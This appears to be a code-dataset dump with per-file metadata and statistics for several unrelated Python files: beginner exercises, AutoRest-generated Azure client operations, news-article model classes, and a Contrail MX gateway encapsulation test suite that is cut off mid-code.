| 57.296078 | 160 | 0.802231 | 3,749 | 29,221 | 6.198986 | 0.086156 | 0.063124 | 0.039759 | 0.067126 | 0.887091 | 0.868072 | 0.851033 | 0.830594 | 0.798451 | 0.783735 | 0 | 0.075166 | 0.084426 | 29,221 | 509 | 161 | 57.408644 | 0.793489 | 0.079258 | 0 | 0.781991 | 0 | 0 | 0.246975 | 0.050452 | 0 | 0 | 0 | 0 | 0.113744 | 0 | null | null | 0 | 0.00237 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43188a5ba9b808ea7d3ea4cc200b592c552a9eb7 | 102 | py | Python | modules/06/params.py | edsu/inst126 | a14f2c6901759f87b1f199f79ed1b8a5c03c688d | [
"CC-BY-4.0"
] | 2 | 2019-08-07T07:49:09.000Z | 2019-08-24T02:07:39.000Z | modules/06/params.py | edsu/inst126 | a14f2c6901759f87b1f199f79ed1b8a5c03c688d | [
"CC-BY-4.0"
] | 2 | 2020-07-18T02:43:50.000Z | 2022-02-10T19:04:57.000Z | modules/06/params.py | edsu/inst126 | a14f2c6901759f87b1f199f79ed1b8a5c03c688d | [
"CC-BY-4.0"
def compute_wages(hours=40, rate=15):
    """Return gross pay for *hours* worked at the hourly *rate*.

    Defaults model a standard 40-hour week at $15/hour.
    """
    gross_pay = rate * hours
    return gross_pay
print(compute_wages(hours=40, rate=20)) | 25.5 | 39 | 0.735294 | 17 | 102 | 4.294118 | 0.588235 | 0.328767 | 0.465753 | 0.520548 | 0.630137 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089888 | 0.127451 | 102 | 4 | 39 | 25.5 | 0.730337 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
432e0ce60b4062da6cb5c2b45b6f92b56e498699 | 756 | py | Python | 3.py | naman-1/python-practice-problems | 8e06c10cb4ad7d37d4cb8c27a277b54b29fe63c5 | [
"MIT"
] | null | null | null | 3.py | naman-1/python-practice-problems | 8e06c10cb4ad7d37d4cb8c27a277b54b29fe63c5 | [
"MIT"
] | null | null | null | 3.py | naman-1/python-practice-problems | 8e06c10cb4ad7d37d4cb8c27a277b54b29fe63c5 | [
"MIT"
] | null | null | null | #Input three numbers and display the largest / smallest number.
def max_min():
    """Read three integers from stdin and print the largest and smallest.

    Bug fix: the original nested-comparison logic mis-reported the
    smallest number for several orderings (e.g. inputs 5, 2, 3 printed
    3 as the smallest instead of 2, and inputs 1, 3, 2 printed 2 as the
    smallest instead of 1). Using the built-in ``max``/``min`` handles
    every ordering, including ties, correctly.
    """
    a = int(input('enter first number: '))
    b = int(input('enter second number: '))
    c = int(input('enter third number: '))
    # max/min cover all six orderings plus ties; no branch analysis needed.
    print('Largest number is: ', max(a, b, c))
    print('smallest number is: ', min(a, b, c))
max_min()
| 756 | 756 | 0.51455 | 97 | 756 | 3.989691 | 0.257732 | 0.206718 | 0.232558 | 0.258398 | 0.604651 | 0.602067 | 0.602067 | 0.529716 | 0.529716 | 0.418605 | 0 | 0 | 0.349206 | 756 | 1 | 756 | 756 | 0.786585 | 0.973545 | 0 | 0.636364 | 0 | 0 | 0.369942 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0 | 0 | 0.045455 | 0.454545 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
4a61bc6a7932ed5f66b6fb4dd7a47fef2a2abfe7 | 13,582 | py | Python | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/AzureParameterGrouping/fixtures/acceptancetestsazureparametergrouping/operations/parameter_grouping_operations.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | 3 | 2018-03-20T22:36:32.000Z | 2021-07-15T02:36:51.000Z | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/AzureParameterGrouping/fixtures/acceptancetestsazureparametergrouping/operations/parameter_grouping_operations.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | null | null | null | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/AzureParameterGrouping/fixtures/acceptancetestsazureparametergrouping/operations/parameter_grouping_operations.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | 1 | 2019-07-20T12:20:03.000Z | 2019-07-20T12:20:03.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
import uuid
from .. import models
class ParameterGroupingOperations(object):
    """ParameterGroupingOperations operations.
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    # NOTE: this class is generated by the AutoRest code generator (see the
    # file header); manual edits will be lost if the file is regenerated.
    def __init__(self, client, config, serializer, deserializer):
        # Keep references to the shared transport client, the
        # (de)serializers and the client configuration for use by the
        # operation methods below.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self.config = config
    def post_required(
            self, parameter_grouping_post_required_parameters, custom_headers=None, raw=False, **operation_config):
        """Post a bunch of required parameters grouped.
        :param parameter_grouping_post_required_parameters: Additional
            parameters for the operation
        :type parameter_grouping_post_required_parameters:
            :class:`ParameterGroupingPostRequiredParameters
            <fixtures.acceptancetestsazureparametergrouping.models.ParameterGroupingPostRequiredParameters>`
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
            deserialized response
        :param operation_config: :ref:`Operation configuration
            overrides<msrest:optionsforoperations>`.
        :rtype: None
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
            if raw=true
        :raises:
            :class:`ErrorException<fixtures.acceptancetestsazureparametergrouping.models.ErrorException>`
        """
        # Flatten the parameter-group object into the individual body,
        # header, query and path parameters it carries.
        body = None
        if parameter_grouping_post_required_parameters is not None:
            body = parameter_grouping_post_required_parameters.body
        custom_header = None
        if parameter_grouping_post_required_parameters is not None:
            custom_header = parameter_grouping_post_required_parameters.custom_header
        query = None
        if parameter_grouping_post_required_parameters is not None:
            query = parameter_grouping_post_required_parameters.query
        path = None
        if parameter_grouping_post_required_parameters is not None:
            path = parameter_grouping_post_required_parameters.path
        # Construct URL
        url = '/parameterGrouping/postRequired/{path}'
        path_format_arguments = {
            'path': self._serialize.url("path", path, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        if query is not None:
            query_parameters['query'] = self._serialize.query("query", query, 'int')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # Time-based uuid1 correlates this request with server-side logs.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        if custom_header is not None:
            header_parameters['customHeader'] = self._serialize.header("custom_header", custom_header, 'str')
        # Construct body
        body_content = self._serialize.body(body, 'int')
        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, **operation_config)
        if response.status_code not in [200]:
            raise models.ErrorException(self._deserialize, response)
        if raw:
            # Caller asked for the raw transport response as well;
            # otherwise the method implicitly returns None.
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def post_optional(
            self, parameter_grouping_post_optional_parameters=None, custom_headers=None, raw=False, **operation_config):
        """Post a bunch of optional parameters grouped.
        :param parameter_grouping_post_optional_parameters: Additional
            parameters for the operation
        :type parameter_grouping_post_optional_parameters:
            :class:`ParameterGroupingPostOptionalParameters
            <fixtures.acceptancetestsazureparametergrouping.models.ParameterGroupingPostOptionalParameters>`
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
            deserialized response
        :param operation_config: :ref:`Operation configuration
            overrides<msrest:optionsforoperations>`.
        :rtype: None
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
            if raw=true
        :raises:
            :class:`ErrorException<fixtures.acceptancetestsazureparametergrouping.models.ErrorException>`
        """
        # Flatten the optional parameter-group object (may be None, in which
        # case all grouped parameters default to None).
        custom_header = None
        if parameter_grouping_post_optional_parameters is not None:
            custom_header = parameter_grouping_post_optional_parameters.custom_header
        query = None
        if parameter_grouping_post_optional_parameters is not None:
            query = parameter_grouping_post_optional_parameters.query
        # Construct URL
        url = '/parameterGrouping/postOptional'
        # Construct parameters
        query_parameters = {}
        if query is not None:
            query_parameters['query'] = self._serialize.query("query", query, 'int')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        if custom_header is not None:
            header_parameters['customHeader'] = self._serialize.header("custom_header", custom_header, 'str')
        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            raise models.ErrorException(self._deserialize, response)
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def post_multi_param_groups(
            self, first_parameter_group=None, parameter_grouping_post_multi_param_groups_second_param_group=None, custom_headers=None, raw=False, **operation_config):
        """Post parameters from multiple different parameter groups.
        :param first_parameter_group: Additional parameters for the operation
        :type first_parameter_group: :class:`FirstParameterGroup
            <fixtures.acceptancetestsazureparametergrouping.models.FirstParameterGroup>`
        :param parameter_grouping_post_multi_param_groups_second_param_group:
            Additional parameters for the operation
        :type parameter_grouping_post_multi_param_groups_second_param_group:
            :class:`ParameterGroupingPostMultiParamGroupsSecondParamGroup
            <fixtures.acceptancetestsazureparametergrouping.models.ParameterGroupingPostMultiParamGroupsSecondParamGroup>`
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
            deserialized response
        :param operation_config: :ref:`Operation configuration
            overrides<msrest:optionsforoperations>`.
        :rtype: None
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
            if raw=true
        :raises:
            :class:`ErrorException<fixtures.acceptancetestsazureparametergrouping.models.ErrorException>`
        """
        # Flatten both (independent) parameter groups into their header and
        # query members.
        header_one = None
        if first_parameter_group is not None:
            header_one = first_parameter_group.header_one
        query_one = None
        if first_parameter_group is not None:
            query_one = first_parameter_group.query_one
        header_two = None
        if parameter_grouping_post_multi_param_groups_second_param_group is not None:
            header_two = parameter_grouping_post_multi_param_groups_second_param_group.header_two
        query_two = None
        if parameter_grouping_post_multi_param_groups_second_param_group is not None:
            query_two = parameter_grouping_post_multi_param_groups_second_param_group.query_two
        # Construct URL
        url = '/parameterGrouping/postMultipleParameterGroups'
        # Construct parameters
        query_parameters = {}
        if query_one is not None:
            query_parameters['query-one'] = self._serialize.query("query_one", query_one, 'int')
        if query_two is not None:
            query_parameters['query-two'] = self._serialize.query("query_two", query_two, 'int')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        if header_one is not None:
            header_parameters['header-one'] = self._serialize.header("header_one", header_one, 'str')
        if header_two is not None:
            header_parameters['header-two'] = self._serialize.header("header_two", header_two, 'str')
        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            raise models.ErrorException(self._deserialize, response)
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def post_shared_parameter_group_object(
            self, first_parameter_group=None, custom_headers=None, raw=False, **operation_config):
        """Post parameters with a shared parameter group object.
        :param first_parameter_group: Additional parameters for the operation
        :type first_parameter_group: :class:`FirstParameterGroup
            <fixtures.acceptancetestsazureparametergrouping.models.FirstParameterGroup>`
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
            deserialized response
        :param operation_config: :ref:`Operation configuration
            overrides<msrest:optionsforoperations>`.
        :rtype: None
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
            if raw=true
        :raises:
            :class:`ErrorException<fixtures.acceptancetestsazureparametergrouping.models.ErrorException>`
        """
        # FirstParameterGroup is shared with post_multi_param_groups; only
        # its header_one / query_one members are used here.
        header_one = None
        if first_parameter_group is not None:
            header_one = first_parameter_group.header_one
        query_one = None
        if first_parameter_group is not None:
            query_one = first_parameter_group.query_one
        # Construct URL
        url = '/parameterGrouping/sharedParameterGroupObject'
        # Construct parameters
        query_parameters = {}
        if query_one is not None:
            query_parameters['query-one'] = self._serialize.query("query_one", query_one, 'int')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        if header_one is not None:
            header_parameters['header-one'] = self._serialize.header("header_one", header_one, 'str')
        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            raise models.ErrorException(self._deserialize, response)
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
| 46.67354 | 166 | 0.692902 | 1,432 | 13,582 | 6.313547 | 0.107542 | 0.051322 | 0.025882 | 0.031855 | 0.804557 | 0.774804 | 0.753456 | 0.750802 | 0.74505 | 0.709988 | 0 | 0.001987 | 0.221985 | 13,582 | 290 | 167 | 46.834483 | 0.853601 | 0.321528 | 0 | 0.70068 | 0 | 0 | 0.096078 | 0.041309 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034014 | false | 0 | 0.020408 | 0 | 0.088435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4ab27ba79e65f4fc49a81c5622a998a24f950007 | 2,194 | py | Python | app/models.py | lwairore/flask-news-highlight | 9b637ddf1cf90e95be4411c716f1b5fa22adb5bb | [
"MIT"
] | 1 | 2020-08-10T08:33:01.000Z | 2020-08-10T08:33:01.000Z | app/models.py | lwairore/flask-news-highlight | 9b637ddf1cf90e95be4411c716f1b5fa22adb5bb | [
"MIT"
] | null | null | null | app/models.py | lwairore/flask-news-highlight | 9b637ddf1cf90e95be4411c716f1b5fa22adb5bb | [
"MIT"
class Business:
    """Plain data holder for one business news article.

    The attributes set at construction time are:
    author, title, description, url, urlToImage and publishedAt.
    """

    def __init__(self, author, title, description, url, urlToImage, publishedAt):
        """Capture the supplied article fields as instance attributes."""
        self.publishedAt = publishedAt
        self.urlToImage = urlToImage
        self.url = url
        self.description = description
        self.title = title
        self.author = author
class Everything:
    """Plain data holder for one article from the 'everything' feed.

    Exposes author, title, description, url, urlToImage and
    publishedAt as instance attributes.
    """

    def __init__(self, author, title, description, url, urlToImage, publishedAt):
        """Store every supplied field on the new instance."""
        (self.author, self.title, self.description,
         self.url, self.urlToImage, self.publishedAt) = (
            author, title, description, url, urlToImage, publishedAt)
class Headlines:
    """Plain data holder for one top-headline article.

    Carries the article's author, title, description, url,
    urlToImage and publishedAt values.
    """

    def __init__(self, author, title, description, url, urlToImage, publishedAt):
        """Record the headline's fields on the instance."""
        self.author, self.title = author, title
        self.description, self.url = description, url
        self.urlToImage, self.publishedAt = urlToImage, publishedAt
class Sources:
    """Plain data holder describing a single news source.

    Carries the source's id, name, url, country and description.
    """

    def __init__(self, id, name, url, country, description):
        """Store the source's fields on the instance.

        Note: the ``id`` parameter name shadows the builtin but is kept
        to preserve the public keyword-argument interface.
        """
        self.description = description
        self.country = country
        self.url = url
        self.name = name
        self.id = id
| 24.10989 | 80 | 0.55515 | 227 | 2,194 | 5.295154 | 0.162996 | 0.049917 | 0.046589 | 0.053245 | 0.81198 | 0.738769 | 0.738769 | 0.738769 | 0.738769 | 0.701331 | 0 | 0.016643 | 0.3701 | 2,194 | 91 | 81 | 24.10989 | 0.853111 | 0.343665 | 0 | 0.741935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
43694681908b13e714ae6a1b1004d71a737b85c9 | 136 | py | Python | vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/import_check.py | lougxing/gbox | f28402d97cacd22b5e564003af72c4022908cb4d | [
"MIT"
] | null | null | null | vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/import_check.py | lougxing/gbox | f28402d97cacd22b5e564003af72c4022908cb4d | [
"MIT"
] | 13 | 2020-01-28T22:30:33.000Z | 2022-03-02T14:57:16.000Z | vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/import_check.py | lougxing/gbox | f28402d97cacd22b5e564003af72c4022908cb4d | [
"MIT"
] | null | null | null | # Make sure we can import the print_function (and therefore that we're
# running a recent python)
from __future__ import print_function
| 34 | 70 | 0.808824 | 22 | 136 | 4.727273 | 0.818182 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154412 | 136 | 3 | 71 | 45.333333 | 0.904348 | 0.683824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
436a53766d0630b0388f29146a10ecd1e1d383a0 | 38,729 | py | Python | serial_scripts/encap/test_encap.py | hkgopal/tf-test | dfb00ce26fb159ab5a91726f9647b68d905cfbad | [
"Apache-2.0"
] | 5 | 2020-09-29T00:36:57.000Z | 2022-02-16T06:51:32.000Z | serial_scripts/encap/test_encap.py | hkgopal/tf-test | dfb00ce26fb159ab5a91726f9647b68d905cfbad | [
"Apache-2.0"
] | 27 | 2019-11-02T02:18:34.000Z | 2022-02-24T18:49:08.000Z | serial_scripts/encap/test_encap.py | hkgopal/tf-test | dfb00ce26fb159ab5a91726f9647b68d905cfbad | [
"Apache-2.0"
] | 20 | 2019-11-28T16:02:25.000Z | 2022-01-06T05:56:58.000Z | # Need to import path to test/fixtures and test/scripts/
# Ex : export PYTHONPATH='$PATH:/root/test/fixtures/:/root/test/scripts/'
#
# To run tests, you can do 'python -m testtools.run mx_tests'. To run specific tests,
# You can do 'python -m testtools.run -l mx_test'
# Set the env variable PARAMS_FILE to point to your ini file. Else it will try to pick params.ini in PWD
# Set the env variable MX_GW_TESTto 1 to run the test
#
from encap import base
from builtins import str
import os
from time import sleep
import socket
import xml.etree.ElementTree as ET
from tcutils.wrappers import preposttest_wrapper
from tcutils.commands import ssh, execute_cmd, execute_cmd_out
from fabric.operations import get, put
from tcutils.wrappers import preposttest_wrapper
from vn_test import *
from vm_test import *
from floating_ip import *
from control_node import *
from policy_test import *
import test
from tcutils.tcpdump_utils import check_pcap_file_exists
class TestEncapCases(base.BaseEncapTest):
    @classmethod
    def setUpClass(cls):
        # One-time class-level setup; delegates to BaseEncapTest.  The
        # explicit two-argument super() form is kept because the file uses
        # python-future (`from builtins import str`) for py2/py3 compat.
        super(TestEncapCases, cls).setUpClass()
    def runTest(self):
        # Placeholder required so the class can be instantiated directly by
        # testtools/unittest; real work happens in the test_* methods.
        pass
    # end runTest
    @test.attr(type='serial')
    @preposttest_wrapper
    def test_encaps_mx_gateway(self):
        '''Test to validate floating-ip from a public pool assignment to a VM. It creates a VM, assigns a FIP to it and pings to outside the cluster.'''
        # Entire test is gated on the MX_GW_TEST env var since it needs a
        # real MX gateway router reachable from the cluster.
        if (('MX_GW_TEST' in os.environ) and (
                os.environ.get('MX_GW_TEST') == '1')):
            if len(self.connections.nova_h.get_hosts()) < 2:
                raise self.skipTest(
                    'Skipping Test. At least 2 compute node required to run the test')
            self.logger.info("Read the existing encap priority")
            existing_encap = self.connections.read_vrouter_config_encap()
            self.logger.info('Setting new Encap before continuing')
            config_id = self.connections.update_vrouter_config_encap(
                'MPLSoUDP', 'MPLSoGRE', 'VXLAN')
            self.logger.info('Created.UUID is %s' % (config_id))
            configured_encap_list = [
                str('MPLSoUDP'), str('MPLSoGRE'), str('VXLAN')]
            # Restore the original encap priority only if we changed it.
            if existing_encap != configured_encap_list :
                self.addCleanup(self.connections.update_vrouter_config_encap, existing_encap[0], existing_encap[1], existing_encap[2])
            # Re-read to confirm the configured priority actually took effect.
            encap_list = self.connections.read_vrouter_config_encap()
            if configured_encap_list != encap_list:
                self.logger.error(
                    "Configured Encap Priority order is NOT matching with expected order. Configured: %s ,Expected: %s" %
                    (configured_encap_list, encap_list))
                assert False
            else:
                self.logger.info(
                    "Configured Encap Priority order is matching with expected order. Configured: %s ,Expected: %s" %
                    (configured_encap_list, encap_list))
            result = True
            # Test topology parameters (public FIP VN + one private VN/VM).
            fip_pool_name = self.inputs.fip_pool_name
            fvn_name = 'public100'
            fip_subnets = [self.inputs.fip_pool]
            vm1_name = 'vm200'
            vn1_name = 'vn200'
            vn1_subnets = ['11.1.1.0/24']
            api_server_port = self.inputs.api_server_port
            api_server_ip = self.inputs.cfgm_ip
            mx_rt = self.inputs.mx_rt
            router_name = self.inputs.ext_routers[0][0]
            router_ip = self.inputs.ext_routers[0][1]
            self.project_fixture = self.useFixture(
                ProjectFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections))
            self.logger.info(
                'Default SG to be edited for allow all on project: %s' %
                self.inputs.project_name)
            self.project_fixture.set_sec_group_for_allow_all(
                self.inputs.project_name, 'default')
            # Public VN exported to the MX via the configured route target.
            fvn_fixture = self.useFixture(
                VNFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections,
                    vn_name=fvn_name,
                    inputs=self.inputs,
                    subnets=fip_subnets,
                    router_asn=self.inputs.router_asn,
                    rt_number=mx_rt))
            assert fvn_fixture.verify_on_setup()
            vn1_fixture = self.useFixture(
                VNFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections,
                    vn_name=vn1_name,
                    inputs=self.inputs,
                    subnets=vn1_subnets))
            assert vn1_fixture.verify_on_setup()
            vm1_fixture = self.useFixture(
                VMFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections,
                    vn_obj=vn1_fixture.obj,
                    vm_name=vm1_name))
            assert vm1_fixture.verify_on_setup()
            fip_fixture = self.useFixture(
                FloatingIPFixture(
                    project_name=self.inputs.project_name,
                    inputs=self.inputs,
                    connections=self.connections,
                    pool_name=fip_pool_name,
                    vn_id=fvn_fixture.vn_id))
            assert fip_fixture.verify_on_setup()
            fip_id = fip_fixture.create_and_assoc_fip(
                fvn_fixture.vn_id, vm1_fixture.vm_id)
            assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
            routing_instance = fvn_fixture.ri_name
            # Configuring all control nodes here
            for entry in self.inputs.bgp_ips:
                hostname = self.inputs.host_data[entry]['name']
                entry_control_ip = self.inputs.host_data[
                    entry]['host_control_ip']
                cn_fixture1 = self.useFixture(
                    CNFixture(
                        connections=self.connections,
                        router_name=hostname,
                        router_ip=entry_control_ip,
                        router_type='contrail',
                        inputs=self.inputs))
            # Add the MX as a BGP peer and allow the session to come up.
            cn_fixturemx = self.useFixture(
                CNFixture(
                    connections=self.connections,
                    router_name=router_name,
                    router_ip=router_ip,
                    router_type='mx',
                    inputs=self.inputs))
            sleep(10)
            assert cn_fixturemx.verify_on_setup()
            vm1_fixture.wait_till_vm_is_up()
            # TODO Configure MX. Doing Manually For Now
            self.logger.info(
                "BGP Peer configuraion done and trying to outside the VN cluster")
            self.logger.info("Now trying to ping %s" % (self.inputs.public_host))
            if not self.inputs.pcap_on_vm:
                self.tcpdump_start_on_all_compute()
            if not vm1_fixture.ping_with_certainty(
                    self.inputs.public_host,
                    count='15'):
                result = result and False
            comp_vm1_ip = vm1_fixture.vm_node_ip
            if not self.inputs.pcap_on_vm:
                # NOTE(review): expects GRE encap toward the MX even though
                # MPLSoUDP has highest priority — presumably because the MX
                # peer only supports MPLSoGRE; confirm against lab config.
                self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
            # NOTE(review): FIP is deleted inline here, unlike the addCleanup
            # pattern used by the sibling test; a failed assert above would
            # skip this line — verify whether cleanup is still guaranteed.
            fip_fixture.disassoc_and_delete_fip(fip_id)
            if not result:
                self.logger.error(
                    'Test ping outside VN cluster from VM %s failed' %
                    (vm1_name))
            assert result
        else:
            self.logger.info(
                "Skipping Test. Env variable MX_TEST is not set. Skipping the test")
            raise self.skipTest(
                "Skipping Test. Env variable MX_TEST is not set. Skipping the test")
        return True
    # end test_encaps_mx_gateway
    @skip_because(dpdk_cluster=True)
    @test.attr(type=[ 'serial', 'sanity', 'vcenter' ])
    @preposttest_wrapper
    def test_apply_policy_fip_on_same_vn_gw_mx(self):
        '''A particular VN is configured with policy to talk across VN's and FIP to access outside'''
        # Entire test is gated on the MX_GW_TEST env var since it needs a
        # real MX gateway router reachable from the cluster.
        if (('MX_GW_TEST' in os.environ) and (
                os.environ.get('MX_GW_TEST') == '1')):
            if len(self.connections.orch.get_hosts()) < 2:
                self.logger.info(
                    "Skipping Test. At least 2 compute node required to run the test")
                raise self.skipTest(
                    'Skipping Test. At least 2 compute node required to run the test')
            self.logger.info("Read the existing encap priority")
            existing_encap = self.connections.read_vrouter_config_encap()
            self.logger.info('Setting new Encap before continuing')
            config_id = self.connections.update_vrouter_config_encap(
                'MPLSoUDP', 'MPLSoGRE', 'VXLAN')
            self.logger.info('Created.UUID is %s' % (config_id))
            configured_encap_list = [
                str('MPLSoUDP'), str('MPLSoGRE'), str('VXLAN')]
            # Restore the original encap priority only if we changed it.
            if existing_encap != configured_encap_list :
                self.addCleanup(self.connections.update_vrouter_config_encap, existing_encap[0], existing_encap[1], existing_encap[2])
            # Re-read to confirm the configured priority actually took effect.
            encap_list = self.connections.read_vrouter_config_encap()
            if configured_encap_list != encap_list:
                self.logger.error(
                    "Configured Encap Priority order is NOT matching with expected order. Configured: %s ,Expected: %s" %
                    (configured_encap_list, encap_list))
                assert False
            else:
                self.logger.info(
                    "Configured Encap Priority order is matching with expected order. Configured: %s ,Expected: %s" %
                    (configured_encap_list, encap_list))
            result = True
            # Test topology parameters: public FIP VN plus two private
            # VN/VM pairs placed on different compute nodes.
            fip_pool_name = self.inputs.fip_pool_name
            fvn_name = 'public100'
            fip_subnets = [self.inputs.fip_pool]
            vm1_name = 'vm200'
            vn1_name = 'vn200'
            vn1_subnets = ['11.1.1.0/24']
            vm2_name = 'vm300'
            vn2_name = 'vn300'
            vn2_subnets = ['22.1.1.0/24']
            api_server_port = self.inputs.api_server_port
            api_server_ip = self.inputs.cfgm_ip
            mx_rt = self.inputs.mx_rt
            router_name = self.inputs.ext_routers[0][0]
            router_ip = self.inputs.ext_routers[0][1]
            self.project_fixture = self.useFixture(
                ProjectFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections))
            self.logger.info(
                'Default SG to be edited for allow all on project: %s' %
                self.inputs.project_name)
            self.project_fixture.set_sec_group_for_allow_all(
                self.inputs.project_name, 'default')
            # Get all compute host
            host_list = self.connections.orch.get_hosts()
            # Public VN exported to the MX via the configured route target.
            fvn_fixture = self.useFixture(
                VNFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections,
                    vn_name=fvn_name,
                    inputs=self.inputs,
                    subnets=fip_subnets,
